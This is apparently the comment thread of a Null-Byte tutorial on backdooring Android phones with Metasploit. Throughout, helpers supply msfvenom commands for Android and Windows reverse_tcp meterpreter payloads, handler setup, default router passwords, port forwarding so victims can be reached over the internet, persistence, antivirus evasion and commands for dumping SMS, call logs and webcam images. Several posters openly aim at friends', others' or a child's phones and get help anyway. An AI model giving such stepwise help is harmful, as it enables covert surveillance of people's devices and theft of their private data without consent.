says handler failed to bind to my ip address

Because you haven't put the hosts internal IP

when i try to scanning my phone.
i'm having this problem:

Failed to load extension: No module of the name extserverandroid.jar found.

that happens on the last par, when i type to exploit, he find the device, but it doesn't scann. forgive me my poor english.

I cannot open the Main Activity app in android while trying to hack my own phone. Also, when I put my LHOST Ip and port in the form 192.168.x.xxx:pppp, it loads. while it loads, the msfconsole says the session is running(i can't execute commands) and when it stops loading it says session died. When I reload it, it does not connect. Please Help

Hi,

Main activity application opens and remains running in the background, so don't worry. And the station dies because of antivirus (specially if it's inbuilt)

Thanks for this post
Is there a way to force a device to install the file could it be done /
i dont intend to do it that way but im just curious

Yes!, use scripts, {I haven't tried that before, I think maybe we will need root to FORCE install it (or maybe not)}

Hey Dear F.E.A.R,
I did anything you did exactly but when I open the trojan in my android device it is showing me this on the msfconsole:

Like, Its trying to connect but without a success.
thanks for your tutorial btw^

Hmm..
Androids are being upgraded to 5.0.2 (i.e. lollipop).
So I see most of the people are getting errors, while exploiting them.
Like session dies immediately etc.
You/We need to upgrade, our Kali too (New version 1.1.0)
And then use the upgraded metasploit-framework.

thx for answer,
Is it able to update the kali for the kali itslef?
from something like and apt-get update or something
thx^^

Yes why not!
Type this in a terminal:
rm -rf /var/lib/apt/lists
apt-get upgrade
apt-get update
apt-get dist-upgrade
--------OR-------
To do everything simultaneously type:
rm -rf /var/lib/apt/lists
apt-get upgrade && apt-get update && apt-get dist-upgrade
Reboot when completed.
(If an error occurs then, reply, which I think will)

Hey F.E.A.R ,
The Update
Another thing , Can you explain me how to port forwarding?
I want it to work on wan , and after I port forward can Trojans like shikataganai work on my friends pc's ?
thx

For that I'll need your router's Company name, Model No. (And version if any)

its NetGear VEGN2610,

I've seen some ways to portforward but it requires a username and password that when I tried to get in it wasnt admin and password

Then try these:

  1. Admin Password
  2. admim Password
  3. Admin password
  4. admin pass
  5. admin admin

If they don't work press your router's hard reset button, to switch the password to the default

To port forward: follow this guide: here

Add 2 services one with port 4444 and the other with 8080.
Then goto firewall rules, and allow these services through.
(Choose 'any' everywhere except Logs, keep the logs to 'never')
Also, in the inbound rules (of firewall rules) put the Kali/Host's Internal IP address.
Also don't use any port checker tool to see if the ports are forwarded, just try a hack.

ok great thx I have hard reset the modem
and I did it all , now only to try the wan backdoor :D
thanks

There is a start port and a finish port ,
what do they mean?

That means the range of ports that has to be forwarded.
Just put port 4444 into both of them.

I'm failing to change the inbound rules too because it asks for a vaild service and I dont know what does it mean

First select the service you created, then edit it's inbound and outbound rules.

Hey ,
I didnt found the place to write the Kali/Host's Internal IP address. And for the ports ,

Is that the way that supposed to be?

thanks^

Yes because you have only configured the outbound rules.
Do you see that link below in the screenshot ?
That states: " Click here to set up inbound...."
When you set up inbound rules, then you will be asked for Kali's IP.

ohhhhh thanks!
the kali ip that I need to insert is the lan ip?
something like 10.0.0.6
thx

Yes, use the cmd: ifconfig to confirm the IP.
Make SURE it is static or you will have to change in the inbound rules again whenever you try to hack on WAN.
Welcome!

What do you mean make sure its static?
like how do I make sure of it , it is always the same 10.0.0.6
when I write ifconfig
:D
thx

btw the trojan is again not working showing the same problem like trying to connect but with no success even though I've upgraded the kali

Now, upgrade metasploit framework: msfupdate

Good to hear that!

Another question ,
How do I remove the Persistence from the phone?

Reboot the phone (if not followed the method, which needs root) or Kill the script from tasks killer (I recommend rebooting)

Tomer:
(Replying here as there was no space for another reply left)
OK don't go into that topic, just make sure it is the same every time you start the hacking procedure.
If it changes sometime, just use this cmd to change it back:

  • ifconfig eth0 10.0.0.6 (if you are using Ethernet connection(wired one))
  • ifconfig wlan0 10.0.0.6 (if you are connected using wireless connection)

---
Now that you have done all the configurations, why not test them, hack an android over the Internet!

okiii,
Thx for great communication :D
Omw to hack over the internet!

Welcome friend,
:)

Hi I have done this and I was able to hack android jellybean but when I tried on android kitkat its not working when I try to take a webcam snap it shows error is there any way for doing that

Hi Amal,
Read the above comment
/\
|

I have just downloaded the kali-linux-1.1.0a ISO 32bit and installed it on VM but this hack does'nt work in that it always shows error. please help

Which error does it show?, I want you to be specific, so that I can help you.
And, you didn't had to download the whole new version of the host, you could have simply updated it, but never mind.

I am using tplink router ...i am having a tough time forwarding...

Be specific, model no.?

Iam getting this error while doing this. What can I do with this please help F.E.A.R

Is the connection stable? (That your session doesn't die frequently)
Try this:
webcam_snap 1 -i
webcam_snap 2 -i
Or maybe the application is denied from accessing the camera internally.

Just a simple question cuz i'm just a beginner,
if the victims removed the apk after opening it.. will I still be able to access their phone or is it hard to remove ?

A simple answer:
If the victim removes the setup apk then the session remains.
If the victim removes the installed application (Main Activity) then the session will die.
Really easy to remove like any other application.

yes my connection is stable and I have hacked the same phone in Kali 1.0.7 version but its not able to hack now in kali 1.1.0a I have tried those two commands but its not working which version of metasploit and kali are you using.

Don't worry about me I corrupted my Kali.
Update your metasploit: msfupdate

I get this on the first step :
The utility msfpayload is deprecated !

& also how do i write the external IP if it changes occasionally ( i don't know about port forwarding )

I'm really a begginer :D

Use this command (tested at last):

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > android.apk
  • Ignore the errors.
  • Go to The root/home folder, right click on the .apk
  • Click Properties, go to permissions tab.
  • Tick the check-box for 'Allow executing file as a program'
  • And then, I think you know what to do... (follow the remaining guide)

First finish/complete the hack test on LAN, then run after WAN, instead of just jumping to it. :) (step-by-step progression)

  • To check your external IP, type this on Google (/default search engine):
  • "What's my IP"
  • For Port Forwarding, first search about it, on a search engine, then give your Router's Company's Name and Model No. (And version if any).

All is well that ends well :D

It's working on both now, thanks a lot.

I just have a problem with streaming & taking a snapshot but it's not a big deal. :)

Good to hear that! ;)
And you are welcome!
(In-built antivirus block the application from turning on camera/using camera)

hello sir i am not able to understand the method clearly. i have done step by step but still i am not able to get connection.firstly i have some questions:-.1-i am using kali linux on vmware and using wifi modem so is it any problem, do i have to make changes in my wifi modem ? 2.-i dont know what to set at port so i set 80 but it wont work.3- i am using my private ip address at Lhost and lport-80 its not working. plz help

i am using tp-link modem. -model no-Model No. TL-WR740N / TL-WR740ND

Hello Mayank,
Welcome to Null-Byte,
First, which method are you using LAN or WAN (Internet), if LAN then I'll answer your questions like this:
1) Yes you have to, but not in your Wi-Fi.

  • Go to settings of the Virtual Machine and Change the Network Adapter settings to Bridged (Automatic)
  • Turn off any firewalls (except windows firewall)

) Don't set any LPORTS anywhere, let the machine stick to the default one (4444)
3) Keep using the Private IP of host machine i.e. Kali (not windows)
---------------------------------NOW My Questions--------------------------------------
Q1. Is the Device/Android connected on the same Wi-Fi Network (LAN) ?
Q2. Have you successfully created the .apk, installed and opened it on the target Android?
Q3. Have you ever tried to hack a PC before?

I have tried the LAN method and success fully gained access.
I will try the wan method
But PLEASE let me know the list of command that we can perform android devices
Thankyou... Thankyou.

Hi Jessy, Welcome to Null-Byte,
When you get the meterpreter session, type:
help or ?
You'll get all the commands, that you want to know.

---------------------------------NOW My Questions--------------------------------------
Q1. Is the Device/Android connected on the same Wi-Fi Network (LAN) ?
Q2. Have you successfully created the .apk, installed and opened it on the target Android?
Q3. Have you ever tried to hack a PC before?

  1. yes android device is connected to same wifi network.
  2. yes i created .apk ,installed and when opened on my android phone shows only one option "reverse tcp "thats it
  3. no sir i m new to linux world

For 2) What? the application is not meant to open, it just runs in the background.
For 3) First you should try hacking a PC (Hack the same Windows on which VMware is installed)
Create the executable file:

  • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.4 X > /root/hi.exe

Set-up the listener:

  • msfconsole
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit

Copy and open/run the file on Windows.

installing kali linux in vmware(virtual machine) is the main problem ? or
should i install kali liunx directly to pc(dual boot )

No, there are complications, but when you get practice, it works fine.
If you want the easy way, then yes go for dual boot.

as i simply installed kali linux on vmware.; i think i need to setup some network setting or some other settings on my kali linux or vmware . can u tell me what should i do after installing kali linux. or some settings

i think i have some problem in networking as i am unable to get back or receive data from victim device

plz suggest some links or others solve the networking problem

I already told you,
Check my reply to your first comment.
Also, I think you should go for dual boot, that's better for you.

Albeit not known as a dumb blonde, I wave the white flag....
Is there someone that can help me, perhaps on a independent consultant basis?
I appreciate any feedback or direction....

HEY !
when i run the msfpayload command, it says:
Invalid payload: android/meterpreter/reversetcp (i typed it with the underscore in the command,though)

pls help me with this, thanks !

Because, you are using Backtrack.

nope, i'm using it in kali ! i guess its v1.0.2

Update Kali

Hey F.E.A.R.
is it bcause the android sub-directory is missing in the payload directory ?
the payload direc goes like:
aix
bsd
java
linux
..
it has windows too, but no android !
i tried doing this with armitage, same error !

It should fix the missing payload after update

hi...can u help hack an android phone ....i have no idea,and i need someone to do it to me please

... The tutorial was made for the same purpose...
Sorry I can't help any further, you are on your own...

Android 5.x.x have been giving out the parsing error usually associated with unchecking unchecking the allow installation from unknown sources check box. This is causing my two most common RATS to be impossibly to install on devices. could it be that one like your self has a solution.

Hi.
Imagin that i have access too somebody's phone.
Can I hack and have access to his phone by this way even he is not connected to my wifi(Lhost ip)?
Thanks.

Hi

Imagin that I have access to somebody's phone and i can install that application that you made. Is it possible to hack and have remote access to his phone even if he is not connected to my wifi(Lhost ip)?

Thanks

Yes surely,
I have mentioned it as the WAN method, go through the tutorial again.

Hi Fear, thanks for this tutorial! I have it working almost fully now. However, I can only access cam and microphone. The android commands to get sms and call log, etc are not there. Is there something more I need to update?

"are not there" what do you mean by that?
'Are not there' when you type help (or ?) ?
EDIT: Oh, and Hi Stv

Thanks for the response! Yes. I also watched a video about this and could see on his screen that there was another section in help titled "Android Tools" with dumpcalllog, checkroot, dumpcontacts, dumpsms, and geolocate. I don't have that section, and those commands do not work if I try to use them. I am connected though and can get screenshots.

Hi.

You said that if the victim open the trojan we are able too do somethings with him or her phone. Imagin that he open the app and after that he close it. Would I be able too access too his phone after he closed it.

(Answer in two situations please.1. If he close it on recent apps or 2.if he just come out of the app(not close it in recent apps)).

Thanks alot for your help.

Hi there,

Sometimes you should try and experiment on these things, and the question you asked proves that you haven't even tried it.

1) The app opens and runs in the background and cannot be closed.
2) If it is closed through recent apps menu, even then the session doesn't die.
3) For terminating the session, you have to kill the app from task killer or reboot the android.

Also, I would like to be able to leave the session and then return later, as in turn off my computer and re-access the same device remotely tomorrow. Is that possible?

Thanks!

Hey fear, I am kind of surprised that no one else is having issues installing backdoors on android devices with running 5.x.x

The error is always a parsing type and I know that the error is 5.x.x specific because I previously tested the metasploit android reverse tcp back door on the device, but after an update from 4.4 kitkat to 5.0.2 lolipop,, all successive installation attempts have failed.

I don't have any errors while exploiting 5.0.x. Only that the session dies quite quickly.
Have you updated you Kali?
Edit: your*

Yes I have but i will attempt to update it again.

I ve got a little problem ... I do everything as said but when I exploit it doesn't give the same result as yours. I did this three times but I still get the same result. Can you tell me what am I doing wrong?

Are you sure the LHOST is of Kali's?
Check it using the cmd: ifconfig

i tried this on my friend's phone whho was connected on my network . it says "can't open file" please help

What says...? Details please

I'm getting a permission denied right after entering the Trojan. Any thoughts? I'm operating as standard non-root user.

Entering the trojan? Putting it into the android? Do you get this error from the android?

No you don't

Hey and how do we encrypt it so that it bypasses AV detection?

I don't think there is an option for encrypting the .apks directly (yet). Instead you have to decompile and dissect it, then encrypt it.

Instead of doing that all, I suggest you to try the hack, I am sure the application will not get detected by (external) AVs.

Also, Welcome the Null-Byte.

Thanks :D NullByte is really an amazing place..

hai,

i followed this article to hack my android device .... but i was not successful in hacking it.

i was struck near "Sending stage (769536 bytes) to 192.168.1.4
please help me thanks in advance

Hi,
Yes, that happened with me too, (I forgot the soution xD),
I think it had happened because the file (.apk) was malformed.
You might have used -X instead of -R (template).

Hi,

I follow all the steps but when I go to install the .apk on my phone (as test) it says . "Parse error. There was a problem parsing the package." can anyone help me? I tried changing the permissions in the file to create as an executable .apk but still nothing. I even tried msfvenom and everything but didn't work either.

Can u post the command u used to make payload??

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > android.apk
Ignore the errors etc, the application will still be created.

Okay, I haven't updated my android to the latest, but it is lollipop, and the hack works perfectly.
Will let you know once I update it, until then try for other androids.

hello f.e.a.r,
i created the apk over my wan ip and whn i tried to install the apk on my phn it shows me this error.. hope u will help me. :)

Yea can u post the command u used to make apk??

no lol i know about it... i was asking them those who get the errors to post the command so we can check for any errors...

lol I thought you mistakenly replied to them instead of me

msfpayload android/meterpreter/reversetcp LHOSTS xxx.xx.xx.xx R > updater.apk

  1. Check that unknown sources is ticked
  2. Copy the apk to windows and then copy it to your mobile to check if the apk was copied correctly as kali can be sometimes frustrating to copy to android

If that doesn't work then its your android os version.. maybe its too high... nothing can be done... try msfvenom once with hope;);)

Hi

am unable to proceed further after exploit .... am using kali linux on virtualBox

yeah same problm m facing.. whn i switched my pc.. the abhove problm i was facing on my laptop.

  1. This maybe because default port set in kali is 4444... so if u hadnt set it to 8080 it wont work..
  2. Try portforward ports
  3. First run exploit command in console then open the app in phone... if u have already opened then close it then reopen the app again

Else it will just be your vm... it cant access it... search google maybe

Use VMware instead.

hi thanks for the reply. i have set port to 8080. now i installed VMware but still am facing same problem.
-> i have set network to bridge(automatic). also tried by keeping at NAT
-> updated kali
-> used msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 LPORT=8080 X > /root/test.exe
and also i tired
msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 X > /root/test.exe

i have dynamic ip and am using wifi to my pc. am using tenda N301 wi-fi.

Damn the posts here guys!!! Sooooo many... it rakes 20 seconds just to hyperscroll to down here lol ;);)

I kniw this post just increades the length... lol .. =.=

(Intense laughter) xD

I did all the things and everything worked fine till i tried to open the apk it says it can't open the file(I have enabled Unknown sources). I'm using CyanogenOS12 based on Lollipop. Someone help please.

It works on that ROM perfectly, try another better file manager and then open/install the apk.

It works now :) thanks :D

You are welcome :)

Just sent you Inbox F.E.A.R.

hi thanks for the reply. i have set port to 8080. now i installed VMware but still am facing same problem.
-> i have set network to bridge(automatic). also tried by keeping at NAT
-> updated kali
-> used msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 LPORT=8080 X > /root/test.exe
and also i tired
msfvenom -p windows/meterpreter/reverse(underscore)tcp LHOST=192.168.0.104 X > /root/test.exe

i have dynamic ip and am using wifi to my pc. am using tenda N301 wi-fi.

Can your vm connect to Internet??

yes vm can connect to internet

Type and run exploit... then run the exe as admin...
Try port 4444
Disable antivirus...
Is vm on same machine??
Try putting public ip in lhost when making exploit and using local ip when running exploit

Remember lhost is the ip of kali system... not windows... also check if your kali and windows hace same local ip.. could be a problem

i'm confused in the ip's here...

i have a 24 online client net broadband connection . i use it in a wireless router. to access the net i have to use the below IPv4 ip as without it i cant login to the 24 client page.

i am using kali Via VMwaer. by using command ifconfig i get the below ip's.

while googling my ip i get a different result.

can u tell me which ip i have to in 1st LHOST and 2nd LHOST...

The one you see on google is your public ip.. for the world...

The on you see on ipv4 is local ip.. for your wifi modem... if you type ifconfig in terminal youll get sane ip as ipv4 ..ie... local ip..

1) if youre hacking someone connected to wifi youre connected to.. then use local ip everywhere... the ipv4 one...

2) if youre hacking someone who is not connected to your wifi at the moment... then when you create the payload using msfpayload or venom... use lhost as the publib ip or the ip you got on google...

But when youll type use payload and then specify the local ip then tyoe exploit... ;);)

ok so as starting im try to hack my own phone here. so lets say i am using data carrier on it not wifi.
now as from the above pics. can u tell which ip to be used there ?
i do get the while creating the payload the one i have googled will be used (if i got it correct :p)
but in second one. can u tell my ip to be used here ?

Inet addr : 192.168.163.129

ok. i will try with this :)
thanx :)

ok.. so i did as everything told above.
gave the commands.

started console
and

installed the app on my phone but after i run the apk the blinking of this rectangular dot stops and nothing happens next. help me please !!!!!!!

Dragon,
At least try the hack on LAN first. (Put your internal IP in 'both' LHOSTS)

Deleted

oki i tried with the LAN, and ip used the one i get after typing command ifconfig

created the payload without using LPORT and got into the console mode

used the exploit handler with the same commands as described and the same IP used above.

but same thing happened this time also. nothing happened after this. :(
what now :o

one more thing. i had gone through the above comments and noticed that u told people to use Bridge Mode rather than using nat . well i cant access net in bridge mode even after ticking the option given below it. Does it has to do something with opening of meterpreter session ?

i even tried manually selecting only my lan connection , still no use ... :(

Hey F.E.A.R. i cant use bridge mod on lan but it working with WAN somehow , so i gave it a try ...
first i tried normally without port forwarding and it again struck on starting payload handler.

then i pot forwarded 4444 and 8080

and it worked ... it started the meterpreter session. but no command works in it. moreover the session automatically closes in few seconds :(

help me please ... :(

LAN strucks on starting payload handler and WAN you can see yourself :(

Hi DRAGON,

I think you are on the right track. Your port is actually listening for a connection. So, all you need to do is install the apk on the victim's phone and launch the app called "Main Activity"

In the terminal (msfconsole), you'll see
#Meterpreter session 1 opened (IP:PORT...) then run any command, e.g dumpsms

actually thats the real problem... i installed the main activity app but nothing happens... in phone the app closes automatically and runs in the background. but in my vmware nothing happens :(

Don't set any LPORTS

Hi F.E.A.R

I'll try to be very specific to my issue in the hope that I'll get a quick response to solve my problem. My computer uses my phone's tethered Wifi, and it's IP (the one I get from Settings > About phone > Status) begins with 154.122.XXX.XXX and is dynamic. It is the same one I get when I go to www.whatsmyip.com. First question, is this the public IP of my android phone? If so, where do I get the phone's internal IP?

When I run 'ifconfig' on terminal I get a static IP that goes 192.168.43.XX. This does not change despite the other one mentioned earlier changing each time I turn on Wifi tethering. So, is it (192.168.43.XX) my Kali's internal IP? If yes, where do I get its external IP?

Lastly and most importantly, there is dire need for me to go outside my network this time, and with a payload that will be persistent. Please, could you answer my above questions about IP and give me the command to create a persistent payload that will work on WAN?

I would really appreciate it.

Hi Walter,
Do not jump start, first try it out on LAN, and if your PC is tethered that means the systems are operating on LAN.

Yes, 154.122... is your android's external IP, which you don't need or need to care about.

Look for internal IP, open WiFi settings, and from the options menu, you will get the details of the network. (Internal IP etc..)

For kali, you already know the Internal IP i.e. 192.168... However for external IP, simply open a browser, and visit the same website you mentioned above.

it is too hard do this hacking with dynamic IP :(

Its the same as lan... nothing different just 1 lhost lol...
If you dont use vm and dualboot kali like I did... everything will be easy as pie.. ;);)

Thanks F.E.A.R, but I already bought a TP_LINK TL-MR3220 and I'm having trouble configuring port forwarding, especially setting up a static IP for Kali. I at first thought I could just go to IP Reservation settings on my router or bind an IP to my MAC address and that would be all, but I still saw my IP from ifconfig changing.

Guys, my ultimate goal is to run a reverse TCP on a device that is not connected to my network, Any help?
Again...any idea how to post on this site?

When youre making payload... in the lhost you type your public ip... the one you can search for on google...
Then when you use multihandler... there you enter lhost as the ip you get in ifconfig.. ie... your local ip...
Run exploit and run the apk on device not connected to your network...
Enjoy..;);)

I am doing the same,but stuck on "starting the payload handler".
can you help me in resolving the issue..

hi i have android 5.0.2 and i am also facing same problem like dragon my i tried both the ip but still my metasploit stuck in

starting payload handler......

i cant move forward any help needed...

Try bridge mode rather than nat...
Try nor setting any lport ..

I strongly suggest using dualboot kali (personal preference) as it doesnt give these hassles.. ;):)

i tried with both vm and with kali installed alongside windows.. but having same issues.. my phone is running with kitkat version. and i am able to install the app successfully.

Please tell me how to port forward in zte router thanks

You need to login to your router...
There will be an iption called portforward or nat in the menu..

Default username and password is admin.. admin and admin..password...
You can search for your router... just type on google your router model and after a space portforwarding ;);)

hi FEAR,
can this method also be used for devices not connected to same network,i.e for devices over the internet..??
if that's possible,how can that be done,i tried it but stuck on "starting the payload handler".

You need to put your public ip when youre making the payload....
But when youre exploiting.. then you enter your local ip ;);)

HELP!
i tried the msfpayload line i got and error message
bash: msfpayload: command not found
why is it not working on my machine?

Msfpayload is discontinued
It has been replaced by msfvenom. .
So you need to use msfvenom.. its almost same..

following the tutorial, you mean i should change msfpayload to msfvenom:
msfvenom android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk
i tried it, got the reply 'no options' msfvenom- a metasploit standalone payload generator

use msfvenom -p android/meterpreter/reversetcp LHOST=( your internal ip if using LAN or public ip if you are using WAN ) R > /root/Upgrader.apk

it says invalid payload selected..!

Because It is: reverse_tcp

sorry sir.may i ask.why when install apk in android i get error " there was a problem parsing the package?? someone help me please...

Yea use a different file browser... ;);)

what do u mean about difference file browser.explain please.

it doesnt work on lolipop. and leads on how to make it work on lolipop

Hi F.E.A.R. !

It working well on local network but i want to do this ''through internet''. I haven't router. My network cable is directly connected on my laptop. I don't know how to port forward in this situation. can you help me? Thanks for this lession!

Step 1. Go to: Control Panel -> Network and Internet -> Network and Sharing Center.

Step 2. Click on: Manage Network Connections -> Right-click on Local Area Connection -> Properties.

Step 3. Click on: Sharing -> Check off; Allow other network users to connect... and Allow other network users to control... boxes -> Settings -> Add a name -> Add your IP -> Then the port you want to open.

... add a port exception in your firewall too!!
Ahave fun ;);)

Se7enPe ACe I am assuming you do that if you wan to send it to the victim who is far way from you? One question do I have install in my phone first and then sent it to the victim? Let's say my kid is 15 blocks from me at school. How do I send the apk to him?

Install my phone and sent it my text? That will be too obvious.

Hmmm...This got me thinking, would it be possible to use a similar method (upload an apk to root directory) to MANUALLY "inject" su into the root directory? Thereby at least obtaining the su binary inside the /root folder, and subsequently (somehow) gaining root access? Even if just temporary, its a start!

Before everyone starts with the "You know how many 'one clicks' exist, right?" I have VERIZON...and I really don't want to deal with the whole java card deal. Plus, I love hacking stuff...always enjoy the challenge - this one just has me stumped.

  • HTC One M9 on 5.0.1
  • Kernel 3.10.49
  • Build 1.33.605.15 CL511781 Release Keys

(F14.VZW.HTC6535LVW.0)

Anyone have any thoughts or a possible direction to point towards?

No, you can't , until:

  1. You use 'adb-scripts' to exploit and root the android during boot/fast-boot/download mode.
  2. During boot we have system privileges, almost like windows.
  3. The device should not be in use during this or...

(Not tested, should work.)

I like your creative thinking, but (1) if you were to "inject' su, then it would be in /bin directory nor /root directory and (2) you would need root privileges to install it and have it do what we expect it to do, give us root privileges.

I'm not sure what you are trying to do?

OTW-

My end goal is to have persistent root access to the supposed "unrootable" VERIZON HTC One M9 (nothing in this world is unhackable if you ask me).

I would need to gain "s-off" (security off) to maintain said root access, but I don't even know where to start with that, one thing at I time I say.

And yes, thanks for correcting my mistake, it would reside in the /bin folder (since su binary is what i'm trying to use....I guess thats the way lol). I'm entering into uncharted territory for myself with trying to change phone permissions without having the necessary permission to actually change the permission in the first place; ie "fake-root" or, pseudo sudo LOL (still with me there?lol), but from the looks, not very different from most nix systems ive come across. I just want to root my phone manually since I cant figure it out, ive come looking for help.

I've obtained "The Hacking Team's" Android Exploit Network/Framework but looking through it, it just looks like my / folder (bin,etc,opt,mnt,usr,share...etc) that has all the exploits burried into a www folder with a server download and some php/batch? scripts.

Should I start a new thread or something? Any places to look for advice on how to do this?

Hello, I understand that this is an old topic and that I might not get a reply, but I would like to ask one anyway.

I'm working behind a corporate firewall that is basically made up of one proxy server. How would I connect back to my laptop from the phone I am trying to exploit? The only external IP I can see is the proxy server's and I cannot use the internet if I do not use it.

Also, I've noticed that on Lollipop (my phone is a rooted LG G3 D855 (International Model) running Euphoria ROM (5.0.2)), the app can easily be seen on the menu screen of my phone. Any ideas on how I could hide it?

Thanks

Ninja243

please tell me FEAR how to port forward on beetel 220BXI adsl2+modem ??

when making Trojan file it shows up
The utility msfpayload is deprecated!
It will be remove in or about 2015-06-08
Please use msfvenom instead
Any help?

msfvenom -p android/meterpreter/reversetcp LHOST=( your internal ip if using LAN or public ip if you are using WAN ) R > /root/Upgrader.apk

Dear OCCUPYT
I am a newbie here. Can you please tell me where to find the ip for LHOST?

the LHOST is going to be your private IP address which can be queried by typing 'ifconfig' into your kali terminal.

LHOST is your IP address. Find it by typing:

ip addr

and hitting enter.

Ninja243

i have install the main activity in my android.it only work on webcamsnap. when i type help, no android command found in cmd and because of that i can not run dumpcalllog command. what should i do? help....

OTW-

My reply was swept away by an odd influx of replies to the topic; I say odd because most questions had already been answered, and, more importantly, take a look at the accounts of Ninja243 and ALI ZAIN - their comments on here are their ONLY comments ever made, which begs me to ask the question, wouldn't google have been quicker than signing up and confirming an account?

I hate to assume this, but it appears i've been TROLLED! (BTW, I'm Way off topic: BUT this just raises my suspicions even more re: the gov't/bigCorp paid trolls whose sole job is to derail topics that "The All Seeing Eye" deems inappropriate...I'll step down from my random mini soap-box, apologies for the rant).

I would appreciate your invaluable insight, OTW, it seems as though some others would rather it not be given...but i'm just a mad hatter so what do I know?

Sorry bro, I've only seen your comment now, but the reason that I've only commented on this post is really just because I was stumped and that I am new to Null-Byte in general. I guess you could see this as an opportunity that I took that seems to be working. Sorry if that weirded you out in any way.

Ninja243

Gametime:

First, I think you are being a bit paranoid. Paranoia in our field can be a good thing, but I think you are letting it get out of control in this matter.

Second, I have read your question again and I'm not sure what your question is other than "should I start another thread?". That might be a good idea so that I am others can understand what you are after.

OTW

@GameTime is this a 999 issue you speak of?

@CYBERHIT

I don't know what a "999" issue is. Besides my paranoid interpretation of an upside-down "666"...which is THE MARK OF THE BEAST!!! Lol. I'm paranoid, yes...delusional...not quite.

@OTW
Thanks mate, I understand that some things aren't meant for public forum.

As far as my paranoia, I was up all night studying for another CompTIA certification (which I passed BTW, whoop whoop) so maybe I was a little bit more paranoid than usual.

This "new thread" has sense been created so maybe I will have a bit more luck there...

Lastly, that's really all you got from my inquiry? Whether or not to start a new thread? I'da pegged you for a thinker! I'm only kidding. Thanks for the reply.

How big is this payload supposed to be? I've used the exact same commands as stated above (in the tutorial), but the .apk file always seems to be 0 bytes big. I tried opening it with leafpad, but it seems empty. Any ideas?

Still waiting

Ninja243

Without any encoding.. it will be about 8 kb..

Thank You for attending to the comments here, 7.

Are you actually thanking me... or is it sarcasm like the rest of em??

...

I have been busy lately and even will be for 2 years, and there are people who want there comments to be attended to.. While I was not present, I see you have done a great job. I wish if you could continue it.

So that's why, Thank You!
Edit: Even the others(Energy Wolf, OTW...)

Oh really??
No thanks man.. at least you appreciate me.. unlike others...

Well, I've tried multiple times to create the payload and it keeps ending up as an empty .apk file. The code I use is:

msfvenom -p android/meterpreter/reversetcp LHOST={IP} R > /root/CandyCrush.apk

What am I doing wrong?

Ninja243

Syntax error..
THIS:

msfvenom -p android/meterpreter/reversetcp LHOST=(YOUR IP) R > (ANY NAME).apk

If you still get a apk of 0 bytes then they may be a problem in your IP (LIKE IN MY CASE). I'm pretty sure you're using vmware, in which network problems are common. Make sure to edit your network connection from NAT to Bridged from vmware settings menu and then connect to the wifi. Open cmd and enter ifconfig. If you get a new IP try that, if its the same try with it again maybe it'll work!

The syntax is right man...

Oh yeah sorry! I thought the underscore mattered.

Is there any error youre getting when running the command??
If not.. then maybe its just too small and not empty... try to install it in phone..

Alright, I've tried running it on my phone (after disabling my firewall) and nothing happens. I've looked at netstat using my phone's terminal and the .apk doesn't even seem to be running (which I found out using top).

I looked at the .apk file using FX File Explorer (which is pretty awesome by the way), and all of the 5 apk files I made were completely empty (which I find weird because something installed).

Has someone backdoored a metasploit payload?
Is that even possible, and if so, how?

Thanks, Ninja243

Edit: I am running a custom ROM on my LG G3, could that be complicating things?

Just give me/us the lhost, I'll create it for you for testing purpose.
(If you trust me of course, which I won't recommend)

Haha, thanks for the offer, but I cannot do that. Not only because of the obvious security implications, but also because of how the corporate firewall that I am using is set up.

Thanks for the help

Ninja243

Mayne you didnt make payload correctly.. it has to be about 8 kb... make sure you type everything correctly. .
Also just start multi handler and check if its working rather than checking netstat..

i have also tried that script of msfvenom but that script is about 0kb but msfpayload is of 8 kb their is error or what ?

Hey, I just wanted to know that how can I keep the app icon hidden after installing? And also how can I make the app auto start after a time period so that I don't have to wait for the the victim to open the app?

BTW, very nice article.

Hello,
You mean persistence?
Here...
(The script is unstable in lollipop)

a single problem: When I try to install it on the phone it always says App not installed while installing. Install from foreign sources is enabled. Any ideas?